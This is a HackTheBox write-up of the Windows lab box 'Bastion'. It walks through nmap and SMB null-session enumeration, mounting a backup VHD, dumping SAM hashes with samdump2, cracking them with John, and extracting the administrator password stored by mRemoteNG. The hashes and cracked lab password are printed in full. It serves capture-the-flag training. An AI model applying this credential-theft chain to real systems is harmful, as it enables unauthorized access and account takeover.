The Bastion Windows box retired this weekend on HackTheBox. It was a Windows box, quite easy to solve but learned a lot along the way. It’s my first write-up of a HTB box so it might not be the best but hopefully it will be a nice summary! We learn about SMB, mounting VHD in Linux, stealing Windows hashes, cracking them with John, and exploiting a program for Privesc.
1: Recon
First, I do the usual nmap scan I start with on all boxes:
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-20 08:43 GMT
Nmap scan report for 10.10.10.134
Host is up (0.34s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -40m01s, deviation: 1h09m15s, median: -2s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2019-07-20T10:43:23+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-07-20 08:43:22
|_ start_date: 2019-07-20 02:31:48
The open ports are not too exciting but we’ve got SMB, so let’s see if we can exploit it.
Enter WORKGROUP\Root's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
Alright, now we can access Backups by using Null session:
Enter WORKGROUP\'s password:
Try "help" to get a list of possible commands.
smb: \> l
. D 0 Fri Sep 6 13:39:45 2019
.. D 0 Fri Sep 6 13:39:45 2019
note.txt AR 116 Tue Apr 16 12:10:09 2019
pFESbxwaWT D 0 Fri Sep 6 13:39:45 2019
SDT65CB.tmp A 0 Fri Feb 22 14:43:08 2019
WindowsImageBackup D 0 Fri Feb 22 14:44:02 2019
7735807 blocks of size 4096. 2759330 blocks available
I found note.txt but nothing interesting there. But there is a directory called WindowsImageBackup!
## 2: Mounting the VHD to get user
In the WindowsImageBackup we find 2 VHD files:
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd A 5418299392 Fri Feb 22 14:45:32 2019
They are big files so we want to avoid downloading them. After a LOT of googling and every more failed attempts, I found the way to mount VHD files in linux. First I needed to install CIFS:
The first and smaller VHD didn’t contain anything of interest so let’s go straight to the second one:
root@kali:~/Desktop/HTB/Bastion# guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --ro ~/Desktop/HackTheBox/Bastion/vhd-mount2 -m /dev/sda1
Wait a few seconds and the VHD should appear as a mounted folder in your system now! I checked the Users folder but nothing there which means there is another step to getting user.txt. After getting back to more googling, I found some info about extracting the hashes in a Windows backup in /System32/config by using samdump2:
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
I saved the hash in a txt file to crack it with john:
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=3
Press 'q' or Ctrl-C to abort, almost any other key for status
bureaulampje (L4mpje)
1g 0:00:00:05 DONE (2019-07-20 12:55) 0.1709g/s 1606Kp/s 1606Kc/s 1606KC/s burg772v..burdy1
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed
Awesome I got the password “bureaulampje”! I know SSH is available on this box from the nmap scan:
And I find the user.txt on the Desktop of the machine!
## 3: Priviledge Escalation
I did a lot of enumeration suggested on different Windows privesc guides, and finally found a weird program sitting in Program Files called nRemoteNG. A quick google search shows that it is vulnerable and can get us admin password: http://hackersvanguard.com/mremoteng-insecure-password-storage/
I download nRemoteNG on my Windows VM. I used WinSCP to access C:\Users\L4mpje\AppData\Roaming\mRemoteNG and download consConf.xml on my VM. Then I import it on nRemoteNG and to see the clear text of a given password, go to “Tools” > “External Tools”. Then right-click in the white space and choose “New External Tool”. Next, in the External Tools Properties, fill in a “Display Name”, “Filename” and some “arguments”, with “Password lookup”, CMD and “/k echo %password%” respectively.
Then right click on the Bastion connection, external tool, Password Lookup, and we get the Admin password. We can now SSH with Administrator and get the root flag!
